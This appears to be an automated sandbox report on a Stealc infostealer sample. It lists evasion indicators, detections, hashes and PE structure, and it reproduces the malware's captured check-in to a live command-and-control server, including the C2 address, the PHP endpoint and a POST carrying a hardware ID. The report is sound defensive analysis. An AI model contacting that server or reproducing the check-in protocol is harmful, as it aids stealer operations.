                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13615
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000D45C0 VirtualProtect ?,00000004,00000100,00000000 0_2_000D45C0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_000E9860
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000E9750 mov eax, dword ptr fs:[00000030h] 0_2_000E9750
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_000E7850
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 420, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2208371198.00000000004BA000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: VProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E7B90 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2167881887.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 420, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2167881887.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 420, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic column; the number in parentheses is the count the matrix shows for that technique, techniques without a number show no count)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 45% | ReversingLabs | Win32.Trojan.Amadey
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/ | true | | unknown
http://185.215.113.206/e2b1563c6670f193.php | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/e2b1563c6670f193.php3u | file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.php/ | file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.phpk | file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/&u | file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/e2b1563c6670f193.phpt | file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1542963
                                  Start date and time:2024-10-27 01:21:06 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 9s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 83
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe
                                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/
185.215.113.206 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.206/e2b1563c6670f193.php
185.215.113.206 | file.exe | malicious | Stealc | 185.215.113.206/e2b1563c6670f193.php
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.16
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.206
WHOLESALECONNECTIONSNL | uLV6jN2BWh.dll | malicious | Unknown | 185.215.113.217
WHOLESALECONNECTIONSNL | uLV6jN2BWh.dll | malicious | Unknown | 185.215.113.217
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.948995573495278
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:1'850'368 bytes
                                  MD5:083803a310e16df3e21777d07a5be88a
                                  SHA1:1a0a8d22d1e39395c4f98a5188ee91384ec54d6f
                                  SHA256:4f3a31155f05af798afc16c664a7e4b364b9cd7f78d2c40f92ca25b1f9dc115b
                                  SHA512:129dfb95b8af7fdb9e46c45a7b567da7432d7244cd85c27c4400b9e995bd19c783726d6acc9eef67aa50f8a08b1b6b493d4d336bf2b17a12c648d86789119e87
                                  SSDEEP:24576:v9WuzrGeK64e7HoU08OIq7L69YNqnhu6lYukZwFqPe85Z7+4IMf1xK7aA8dEY:v9WuzrGev4e7HoUqdNqhNRkZ+4zD28T
                                  TLSH:A28533BB1B6ADE1AC88E5E32567F35322732A4DD01E9D0D0D7A2CE34E9D924731C66C0
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...9$.g...........
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xaa6000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671C2439 [Fri Oct 25 23:05:29 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007F95D504757Ah
                                  hint_nop dword ptr [eax+eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  jmp 00007F95D5049575h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 023189d882e7c51b76e068e125b5a6c6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a9000 | 0x200 | 4a3e00176ac5e4b3fef877fe7fa36404 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ybzlaxoh | 0x507000 | 0x19e000 | 0x19da00 | a85548392885b4a6ec69fbb25a293f62 | False | 0.9951239753324267 | data | 7.954973653078467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gchetgti | 0x6a5000 | 0x1000 | 0x400 | 2fdbd5a697bc9af708654c95bcffbeb7 | False | 0.7490234375 | data | 5.95094527425675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6a6000 | 0x3000 | 0x2200 | b626b62ab486cb4da99fb53899340592 | False | 0.014361213235294117 | DOS executable (COM) | 0.07484566876978713 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-27T01:22:05.157295+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 57121 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 01:22:03.862620115 CEST | 57121 | 80 | 192.168.2.6 | 185.215.113.206
Oct 27, 2024 01:22:03.868000031 CEST | 80 | 57121 | 185.215.113.206 | 192.168.2.6
Oct 27, 2024 01:22:03.868119955 CEST | 57121 | 80 | 192.168.2.6 | 185.215.113.206
Oct 27, 2024 01:22:03.868774891 CEST | 57121 | 80 | 192.168.2.6 | 185.215.113.206
Oct 27, 2024 01:22:03.874131918 CEST | 80 | 57121 | 185.215.113.206 | 192.168.2.6
Oct 27, 2024 01:22:04.783149958 CEST | 80 | 57121 | 185.215.113.206 | 192.168.2.6
Oct 27, 2024 01:22:04.783235073 CEST | 57121 | 80 | 192.168.2.6 | 185.215.113.206
Oct 27, 2024 01:22:04.871794939 CEST | 57121 | 80 | 192.168.2.6 | 185.215.113.206
Oct 27, 2024 01:22:04.877178907 CEST | 80 | 57121 | 185.215.113.206 | 192.168.2.6
Oct 27, 2024 01:22:05.157239914 CEST | 80 | 57121 | 185.215.113.206 | 192.168.2.6
Oct 27, 2024 01:22:05.157294989 CEST | 57121 | 80 | 192.168.2.6 | 185.215.113.206
Oct 27, 2024 01:22:08.651814938 CEST | 57121 | 80 | 192.168.2.6 | 185.215.113.206
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 01:22:02.126739025 CEST | 53 | 65350 | 1.1.1.1 | 192.168.2.6
                                  • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 57121 | 185.215.113.206 | 80 | 420 | C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 27, 2024 01:22:03.868774891 CEST90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Oct 27, 2024 01:22:04.783149958 CEST203INHTTP/1.1 200 OK
                                  Date: Sat, 26 Oct 2024 23:22:04 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 27, 2024 01:22:04.871794939 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBG
                                  Host: 185.215.113.206
                                  Content-Length: 210
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 46 42 36 41 35 32 35 32 33 35 35 37 34 32 31 37 39 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 2d 2d 0d 0a
                                  Data Ascii:
                                  ------JJKFBFIJJECGCAAAFCBG
                                  Content-Disposition: form-data; name="hwid"

                                  01FB6A525235574217965
                                  ------JJKFBFIJJECGCAAAFCBG
                                  Content-Disposition: form-data; name="build"

                                  puma
                                  ------JJKFBFIJJECGCAAAFCBG--
                                  Oct 27, 2024 01:22:05.157239914 CEST | 210 | IN | HTTP/1.1 200 OK
                                  Date: Sat, 26 Oct 2024 23:22:05 GMT
                                  Server: Apache/2.4.52 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s= (base64 encoding of "block")



                                  Target ID:0
                                  Start time:19:21:58
                                  Start date:26/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0xd0000
                                  File size:1'850'368 bytes
                                  MD5 hash:083803A310E16DF3E21777D07A5BE88A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2167881887.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true


                                    Execution Graph

                                    Execution Coverage:8.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:9.7%
                                    Total number of Nodes:2000
                                    Total number of Limit Nodes:24
lstrcpy 14656->14658 14663 d497f 14658->14663 14659 ea820 2 API calls 14660 d4f05 14659->14660 14661 ea9b0 4 API calls 14660->14661 14664 d4f1b 14661->14664 14662 d4f27 ctype 14666 ea7a0 lstrcpy 14662->14666 14667 ea9b0 4 API calls 14663->14667 14665 ea8a0 lstrcpy 14664->14665 14665->14662 14679 d4f57 14666->14679 14668 d49a9 14667->14668 14669 ea8a0 lstrcpy 14668->14669 14670 d49b2 14669->14670 14671 ea9b0 4 API calls 14670->14671 14672 d49d1 14671->14672 14673 ea8a0 lstrcpy 14672->14673 14674 d49da 14673->14674 14675 ea920 3 API calls 14674->14675 14676 d49f8 14675->14676 14677 ea8a0 lstrcpy 14676->14677 14678 d4a01 14677->14678 14680 ea9b0 4 API calls 14678->14680 14679->13700 14681 d4a20 14680->14681 14682 ea8a0 lstrcpy 14681->14682 14683 d4a29 14682->14683 14684 ea9b0 4 API calls 14683->14684 14685 d4a48 14684->14685 14686 ea8a0 lstrcpy 14685->14686 14687 d4a51 14686->14687 14688 ea9b0 4 API calls 14687->14688 14689 d4a7d 14688->14689 14690 ea920 3 API calls 14689->14690 14691 d4a84 14690->14691 14692 ea8a0 lstrcpy 14691->14692 14693 d4a8d 14692->14693 14694 d4aa3 InternetConnectA 14693->14694 14694->14650 14695 d4ad3 HttpOpenRequestA 14694->14695 14697 d4ebe InternetCloseHandle 14695->14697 14698 d4b28 14695->14698 14697->14650 14699 ea9b0 4 API calls 14698->14699 14700 d4b3c 14699->14700 14701 ea8a0 lstrcpy 14700->14701 14702 d4b45 14701->14702 14703 ea920 3 API calls 14702->14703 14704 d4b63 14703->14704 14705 ea8a0 lstrcpy 14704->14705 14706 d4b6c 14705->14706 14707 ea9b0 4 API calls 14706->14707 14708 d4b8b 14707->14708 14709 ea8a0 lstrcpy 14708->14709 14710 d4b94 14709->14710 14711 ea9b0 4 API calls 14710->14711 14712 d4bb5 14711->14712 14713 ea8a0 lstrcpy 14712->14713 14714 d4bbe 14713->14714 14715 ea9b0 4 API calls 14714->14715 14716 d4bde 14715->14716 14717 ea8a0 lstrcpy 14716->14717 14718 d4be7 14717->14718 14719 ea9b0 4 API calls 14718->14719 14720 d4c06 14719->14720 14721 ea8a0 lstrcpy 14720->14721 14722 d4c0f 14721->14722 14723 ea920 3 API calls 
